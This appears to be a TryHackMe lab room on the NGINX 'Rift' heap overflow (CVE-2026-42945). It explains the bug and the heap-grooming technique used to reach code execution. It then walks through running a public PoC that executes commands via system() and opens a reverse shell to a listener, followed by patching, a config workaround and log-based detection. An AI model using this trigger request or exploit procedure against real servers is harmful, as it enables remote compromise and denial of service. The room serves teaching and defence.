To access material, start machines and answer questions login.
Set up your virtual environment
NGINX Rift is a heap buffer overflow in the ngx_http_rewrite_module of NGINX that allows an unauthenticated remote attacker to crash a worker process or, under favourable memory conditions, achieve remote code execution. The bug has been present in the codebase since 2008 and was disclosed on 13 May 2026 by depthfirst, alongside three other memory corruption issues identified during the same audit.
Key facts:
- CVSS v4 base score: 9.2 (Critical)
- Affected components: NGINX Open Source 0.6.27 through 1.30.0, NGINX Plus R32 through R36, and several downstream F5 products including NGINX App Protect, Gateway Fabric, and Ingress Controller
- Fixed versions: NGINX Open Source 1.30.1 and 1.31.0, NGINX Plus R32 P6, R36 P4, and 37.0.0 (the first release on the new Long-Term Support track introduced on 13 May 2026)
- Public PoC: Available on the DepthFirstDisclosures/Nginx-Rift (opens in new tab) repository
The vulnerability is not reachable on every NGINX install. It requires a configuration that uses the rewrite directive with an unnamed PCRE capture (such as $1 or $2), a replacement string containing a question mark, and a subsequent rewrite, if, or set directive in the same scope. This pattern is common in production deployments that perform legacy URL canonicalisation, API gateway routing, or path preservation across migrations, so the realistic exposure is considerably broader than the trigger condition might first suggest.
Three other vulnerabilities were disclosed alongside Rift in the same audit. The full set is summarised below:
| CVE | Subsystem | Severity | Impact |
|---|---|---|---|
CVE-2026-42945 (Rift) |
ngx_http_rewrite_module |
9.2 Critical | Heap overflow, RCE |
CVE-2026-42946 |
ngx_http_scgi_module, ngx_http_uwsgi_module |
8.3 High | Heap overread on crafted upstream response (AitM), worker memory disclosure or DoS |
CVE-2026-40701 |
ngx_http_ssl_module |
6.3 Medium | Use-after-free on OCSP DNS path |
CVE-2026-42934 |
ngx_http_charset_module |
6.3 Medium | Out-of-bounds read on UTF-8 boundary |
Rift is the most severe of the four because it is unauthenticated, deterministic in heap layout across worker processes, and reachable on widely deployed configurations. The same multi-process architecture that makes NGINX a reliable web server (a master process and several identical workers, each with a duplicated address space) also makes the bug forgiving to exploit. A failed attempt only crashes a worker; the master immediately respawns a fresh worker with the same memory layout, so an attacker can retry until the exploit succeeds.
Learning Objectives
By the end of this room, you will be able to:
- Describe the role of the
rewriteandsetdirectives in NGINX request processing - Explain the two-pass design of the NGINX script engine and how a state mismatch between passes causes the heap overflow
- Identify the configuration pattern that exposes a server to
CVE-2026-42945 - Walk through the heap feng shui technique used to convert the overflow into code execution
- Apply the published configuration mitigation and confirm the proof-of-concept is blocked
Prerequisites
This room assumes comfort with HTTP request structure, the basics of reverse proxying, and operation from a Linux command line. Familiarity with the Web Fundamentals module and the Linux Fundamentals module is sufficient. Prior exposure to heap memory corruption concepts is helpful but not required; the relevant heap concepts are introduced in Task 4 as they appear.
Connecting to the Machine
Click the Start Machine button at the top of this task and allow about a minute for the machine to boot. The room provides a graphical VNC session that opens in a new browser window; the desktop session is already logged in as the ubuntu user. The vulnerable NGINX target runs on port 19321, so the target is reachable from the VNC desktop at http://127.0.0.1:19321/ and from a remote attacker at http://MACHINE_IP:19321/, where MACHINE_IP is the address shown at the top of this task. The full launch state and the exploitation procedure are covered in Task 5.
I have successfully started my machine.
The two NGINX directives at the centre of CVE-2026-42945 are rewrite and set. Both are routine building blocks of production configurations, and both have well-defined, documented behaviour. In this section, we describe what they do and why they are commonly chained, before showing how the chain triggers the bug in Task 3.
The rewrite directive modifies the request URI based on a regular expression match. When NGINX matches a request URI against the pattern, the directive replaces the URI with a new string. A typical configuration might rewrite all paths under /api/ to a versioned backend path. The configuration below routes any request whose starts with /api/ to the equivalent path under /v2/api/, preserving everything after /api/ through the unnamed capture $1.
location ~ ^/api/(.*)$ {
rewrite ^/api/(.*)$ /v2/api/$1;
}
A request for /api/users/42 is rewritten internally to /v2/api/users/42 before NGINX hands it on for further processing. The string $1 in the replacement is an example of a regex back-reference, where $1 corresponds to the first parenthesised group in the matching pattern. NGINX supports the standard PCRE capture syntax; captures are unnamed by default, which is the form $1, $2, and so on.
A subtle behaviour matters here. If the replacement string contains a question mark, NGINX treats everything after the question mark as a new query string and discards the request's original arguments. The replacement /internal?migrated=true rewrites the path to /internal and replaces the query string with migrated=true. This is the documented way to drop or rewrite query parameters during URL canonicalisation.
The set directive assigns a value to a custom variable that NGINX maintains for the lifetime of the request. The value can be a constant, another variable, or a back-reference to the most recently evaluated regular expression. Variables defined with set are typically used to preserve information that would otherwise be lost across a rewrite, or to compose values used later in proxy headers, log formats, or further routing decisions. A common pattern saves the original captured path to a variable so that backend applications and access logs retain visibility of what the client originally requested.
location ~ ^/api/(.*)$ {
rewrite ^/api/(.*)$ /v2/api/$1;
set $original_endpoint $1;
}
The set directive runs after the rewrite, and the back-reference $1 still refers to the capture from the regex evaluated against the original /api/(.*)$ path. The chain therefore performs two related operations against the same capture group, in a documented and supported order.
Under the surface, NGINX does not interpret either directive at request time. Both directives are compiled at configuration load into a sequence of operations executed by an internal script engine. At runtime, the engine walks the compiled operations in a two-pass process. The first pass calculates the total length of the final output string so the script engine can allocate exactly the right amount of memory from its per-request pool. The second pass writes the actual data into that buffer. The design is performant because it avoids repeated small allocations, but it depends on the length calculation in the first pass matching the data written in the second pass exactly. The state mismatch that breaks this assumption is the subject of Task 3.
The root cause of CVE-2026-42945 is a single internal flag that the script engine sets in one pass and reads in the other, despite the two passes running against different engine instances. The flag is is_args, defined on struct ngx_http_script_engine_t. It indicates whether the engine is currently writing into the query-string portion of a URL, and it controls whether captured values are URI-escaped before being written.
When a rewrite replacement string contains a question mark, the compiled bytecode includes a call to ngx_http_script_start_args_code. That function sets e->is_args = 1 on the main script engine. The flag is never explicitly reset before subsequent compiled directives execute. For a configuration where rewrite is followed by set, the main engine therefore carries is_args = 1 into the evaluation of the set directive.
The set directive uses a separate path when its right-hand side references a regex capture. The relevant function is ngx_http_script_complex_value_code, which executes the length-calculation pass against a fresh, fully zeroed sub-engine, conventionally named le. The author of the original code did this so the length calculation could not be polluted by state left over from earlier operations. The actual copy pass, however, still runs on the main engine e, with is_args unchanged.
The decision to escape or not escape a captured value is made by ngx_http_script_copy_capture_len_code (used during the length pass) and ngx_http_script_copy_capture_code (used during the copy pass). Both functions check the same condition before deciding whether to call ngx_escape_uri. The condition combines the engine's is_args flag with whether the request URI contained characters that need escaping.
During the length pass, le.is_args is zero because the sub-engine was zeroed. The condition evaluates false, the function takes the simple path, and returns the unescaped capture length, which is the raw number of bytes in the captured substring. During the copy pass, e->is_args is still one because the main engine was never reset. The condition evaluates true, the function takes the URI-escaping path, and writes the escaped capture into the buffer.
For URI-safe characters that escaping leaves untouched, the two passes produce the same number of bytes and the mismatch goes unnoticed. For escapable characters, escaping replaces each character with its three-byte %xx percent-encoded form. The plus sign, for example, escapes to %2B. If the captured substring contains N escapable characters, the copy pass writes raw_size + 2 * N bytes into a buffer that was allocated for only raw_size bytes. The result is a deterministic, attacker-controlled overflow on the NGINX worker's memory pool.
The trigger configuration in the published advisory is short:
location ~ ^/api/(.*)$ {
rewrite ^/api/(.*)$ /internal?migrated=true;
set $original_endpoint $1;
}
The rewrite replacement string contains a question mark, so is_args is set on the main engine. The set directive references the unnamed capture $1, so it routes through ngx_http_script_complex_value_code and the two-pass mismatch fires. If the client request URI for this location contains plus signs (or any other URI-escapable character) inside the captured part, those characters are counted as one byte each by the length pass and three bytes each by the copy pass.
A request that triggers a manageable overflow against the configuration above looks like the request below. The URI is constructed to land in the vulnerable location block, the captured part (.*) contains a long run of plus signs, and each plus is later escaped to %2B during the copy pass.
GET /api/+++++++++++++...+++++++++++++ HTTP/1.1
Host: localhost
For 2,000 plus signs in the capture, the length pass reserves 2,000 bytes and the copy pass writes 6,000 bytes. The 4,000-byte difference is written past the end of the allocated pool chunk, into whatever adjacent heap memory the pool allocator placed next to it. Turning that into code execution is the subject of Task 4.
A second restriction worth recording at this point is that the overflow bytes pass through ngx_escape_uri, which only emits ASCII bytes that are valid in a . Null bytes, control characters, and any byte outside the -safe set cannot be written by the overflow. An attacker must therefore construct any binary payload, including pointers, through other means.
A heap overflow alone is not code execution. To turn the overflow into a useful primitive, an attacker has to overwrite something on the heap that the worker process will later use as a pointer, ideally as a function pointer. NGINX's own memory management offers a convenient target.
NGINX allocates memory through per-request memory pools, represented by the ngx_pool_t structure. Each pool tracks its current allocation cursor, a chain of large allocations, and a linked list of cleanup callbacks. The cleanup list is the relevant field. Each entry is a ngx_pool_cleanup_t containing a function pointer (handler) and an argument pointer (data). When the pool is destroyed, NGINX walks the list and calls handler(data) for each entry. If an attacker controls the cleanup list, they control the function pointer and the argument, and system() with an attacker-supplied command string is a clean choice.
The cleanup pointer sits at offset 64 inside ngx_pool_t, after several earlier fields. A contiguous heap overflow from a preceding pool will therefore corrupt all of those earlier fields on the way to the cleanup pointer. If the corrupted pool is used again for any allocation, network read, or further request processing, NGINX will dereference one of those corrupted fields and the worker will crash before reaching the cleanup phase.
The exploitation primitive must therefore corrupt the cleanup pointer and then trigger the pool's destruction immediately, before any of the other corrupted fields are touched. The depthfirst writeup describes the resulting technique as a cross-request heap feng shui, where the attacker arranges the pool layout and the lifecycle ordering using a careful sequence of HTTP connections.
The published sequence proceeds in four stages. An attacker first opens a connection and sends only partial HTTP headers, which causes NGINX to allocate a request pool but not to start processing the request. A second connection is opened immediately after, causing the pool allocator to place the second connection's pool directly adjacent to the first. The attacker then completes the headers of the first connection in a way that triggers the rewrite overflow, so the overflow runs out of the first pool and into the header of the second, adjacent pool. Finally, the attacker closes the second connection, which causes NGINX to call ngx_destroy_pool on the corrupted pool. The destroy path walks the cleanup list and never touches the other corrupted fields, so the worker calls the attacker's chosen handler with the attacker's chosen argument and does not crash before reaching it.
A second restriction has to be circumvented. The bytes written by the overflow must survive URI escaping, so any value written into the cleanup pointer must consist entirely of URI-safe bytes. An attacker therefore cannot write a fully arbitrary 64-bit pointer in a single overflow. The published PoC works around this in two ways. First, the heap layout is deterministic across worker restarts because each worker inherits its parent's address space layout, so the location of any sprayed structure is predictable across attempts. Second, the attacker sprays many fake ngx_pool_cleanup_t structures using POST request bodies, which (unlike URIs or headers) are forwarded into NGINX worker memory as raw bytes without escaping. POST bodies can therefore contain real binary pointers, including null bytes.
The spray populates the worker's heap with thousands of fake cleanup structures at predictable offsets. The attacker repeatedly retries the exploit, each time using a different low-byte overwrite to redirect the cleanup pointer until it lands on one of the sprayed fake structures. The combination of deterministic layout, a respawning worker process, and many sprayed candidates means that the brute-force search converges quickly.
Two assumptions are worth highlighting. The first is that the exploit as published demonstrates only when ASLR is disabled at the operating system level. With ASLR enabled, base addresses change across the master process's address space, and the sprayed pointers must be discovered before they can be used. The depthfirst writeup notes that the byte-by-byte overwrite of pointers in the cleanup list can theoretically be used to leak ASLR over many attempts, but the published proof-of-concept does not implement that step.
The second is that the overflow remains a reliable denial-of-service primitive even with ASLR enabled. Any request matching the vulnerable configuration with a long enough run of escapable characters will corrupt the heap and crash a worker. A small loop of such requests will keep NGINX in a constant restart cycle and effectively take the front-door web server offline.
Step 1: Confirm the is Running
Open a terminal in the VNC desktop. The should already be up from the provisioning step. Confirm its state with docker ps, filtering on the compose project label so the output is short.
sudo docker ps --filter label=com.docker.compose.project=nginx-rift
The output shows a single running container named nginx-rift-nginx-1, with port 19321/tcp mapped to 0.0.0.0:19321 on the host.
Verify the target is responsive with a benign request. A normal request to the vulnerable location block returns a 200 response with the rewritten URI.
curl -s "http://127.0.0.1:19321/api/users/42"
Step 2: Run the PoC with a Single Command
The exploit driver poc.py accepts two mutually exclusive operating modes. The first, --cmd, executes a single shell command through the system() handler and exits. The second, --shell, generates a Python reverse shell, listens for the connection on the host, and drops you into an interactive session inside the container.
Run the single-command mode first, with a payload that writes a marker file to /tmp/pwned inside the . The time prefix records how long the brute-force loop takes to land.
time python3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned'
Successful exploitation prints crashed - system("...") executed to stdout, typically within thirty seconds to two minutes. The PoC iterates through a hardcoded list of heap-offset candidates and retries each up to ten times. The master's respawn loop hides individual failures.
Once the PoC reports success, verify the command ran inside the container by reading the marker file with docker exec.
sudo docker exec nginx-rift-nginx-1 cat /tmp/pwned
The file contents should be hello from depthfirst. Because the cleanup handler runs as root in this lab, the marker file is also owned by root.
Step 3: Run the PoC with a Reverse Shell
The --shell mode generates a Python reverse-shell command, spawns a local netcat listener on the host, and runs the exploit against the same target. The listener IP defaults to 172.17.0.1, which is the host's address on the Docker bridge that the container is attached to, so no flag overrides are required for the published setup.
python3 poc.py --shell
The driver prints the generated reverse-shell command, starts a listener on TCP port 1337, and runs the brute-force loop. On a successful trigger, the listener catches the inbound connection and you receive an interactive /bin/sh prompt running as the NGINX worker user inside the container.
From the prompt, confirm you have root inside the container and read the flag baked into the image.
id
cat /flag.txt
The id output confirms the cleanup handler is executing as root, which is the upstream image's default. The flag at /flag.txt is in the THM{...} format and is the room's primary objective.
Take care when running commands inside the reverse shell: the worker process is still subject to the master's lifecycle, and long-running commands can be terminated when the next exploit attempt corrupts a sibling worker. Keep interactive sessions short and copy any output you need back to the listener promptly.
What is the content of flag.txt?
Two layers of defence apply to CVE-2026-42945. The first is the upstream patch, which restores propagation of is_args into the sub-engine used by ngx_http_script_complex_value_code. The second is a configuration-level workaround that side-steps the trigger pattern without waiting for a patched binary.
Patching
NGINX Open Source 1.30.1 and 1.31.0 contain the fix. NGINX Plus customers receive the fix in R32 P6 and R36 P4. F5 has separately published patched versions of NGINX App Protect WAF, NGINX App Protect DoS, NGINX Gateway Fabric, NGINX Ingress Controller, and the F5 WAF and DoS products that embed NGINX. The vendor advisory at https://my.f5.com/manage/s/article/K000160932 lists exact fixed versions per product family.
Distributions have shipped patched packages on their usual channels. Distribution-packaged NGINX should not be assumed safe based on the package name; the actual NGINX version and the active configuration both matter. On Debian-derived systems, nginx -v and apt-cache policy nginx together show the installed version and the available upgrade. On Red Hat-derived systems, nginx -v and dnf info installed nginx provide the same information.
Configuration Workaround
On hosts where an immediate upgrade is not possible, the vulnerability can be neutralised by replacing every unnamed PCRE capture in an affected rewrite directive with a named capture. The bug is reachable only through the unnamed-capture code path; named captures use a different evaluation function that is not affected by the is_args state mismatch.
The trigger configuration from Task 3 is mitigated by changing the unnamed (.*) to a named capture such as (?<path>.*) and updating the set to reference $path instead of $1.
location ~ ^/api/(?<path>.*)$ {
rewrite ^/api/(?<path>.*)$ /internal?migrated=true;
set $original_endpoint $path;
}
The behaviour of the configuration is preserved. The trigger is removed. This workaround should be treated as a temporary measure rather than a permanent fix, as it is sensitive to future changes elsewhere in the codebase.
Detection
The same property that makes the bug exploitable also makes it visible. A successful exploit attempt produces a burst of long, plus-padded URIs to the same vulnerable location, followed by a sequence of worker restarts. Either signal on its own is suspicious; the combination is unambiguous.
NGINX access logs capture every request URI as long as logging is configured for the affected location block. A simple grep against access.log for unusually long URIs containing high run-lengths of plus signs surfaces probe and exploit traffic. The example below extracts requests whose contains thirty or more consecutive + characters, which is well above any benign client behaviour.
grep -E '\+{30,}' /var/log/nginx/access.log
NGINX error logs, on the other hand, record worker process restarts when the master log level is set to notice or higher. A spike in worker process N exited on signal 11 entries within a short window indicates that something is crashing workers regardless of the cause, and should be correlated with the access log timestamps. The depthfirst PoC also leaves a distinctive pattern of half-open connections and immediate-closed connections on the affected port; a ss -t snapshot during an active attack shows many connections in the CLOSE_WAIT and LAST_ACK states.
Web application rules can be deployed in front of NGINX to block requests whose contains long runs of escapable characters, but care should be taken to avoid blocking benign clients that legitimately pass escapable characters in path components. A safer signature targets the specific combination of an matching a known rewrite pattern with a payload above a length threshold and a high proportion of plus signs.
NGINX Rift is a state-mismatch bug rather than a parser bug or a logic bug. The vulnerability exists because one engine instance was reset and another was not, and because a single boolean flag silently changes the meaning of a downstream length calculation. The class of bug is older than the eighteen years the vulnerability has lived in the NGINX codebase; equivalent two-pass length-then-copy patterns occur in many performance-oriented C codebases, and a search of historical feeds turns up close cousins in parsers, RPC frameworks, and database query builders.
Three operational lessons stand out. The first is that configuration matters as much as version. A patched NGINX with a vulnerable rewrite pattern still defines the attack surface; an unpatched NGINX with no rewrite directives at all has no exposure. A version inventory alone is therefore not sufficient to triage exposure to CVE-2026-42945. Configuration review against the trigger pattern (unnamed PCRE capture, replacement string containing a question mark, subsequent rewrite, if, or set directive) is required to scope risk accurately.
The second is that worker respawn architectures are double-edged. The same property that makes NGINX a robust web server in the face of crashes is what makes the bug forgiving to exploit. Architectural choices made for availability often create useful behaviours for an attacker, and the assumption that a crash is the worst possible outcome can hide the existence of an underlying corruption primitive.
The third is that long-lived code with no recent security activity is not the same as proven code. The is_args flag in ngx_http_script.c has been in the codebase since 2008. It survived eighteen years of code review, integration testing, and production deployment, and an automated whole-repository analysis surfaced it on a six-hour scan once the right kind of analysis was pointed at it. Periodic re-audit of stable code is therefore as important as catching new bugs in fresh changes.
The vulnerability class continues to be the subject of active research. The depthfirst disclosure mentions that three further memory corruption issues were identified in the same audit (covered briefly in Task 1), and the broader pattern of state-mismatch bugs is explored further in the context of Copy Fail and the Dirty Frag kernel rooms, where a similar but kernel-side mismatch creates a different primitive on a different target.
I can now exploit CVE-2026-42945!
Ready to learn Cyber Security?
TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.
Already have an account? Log in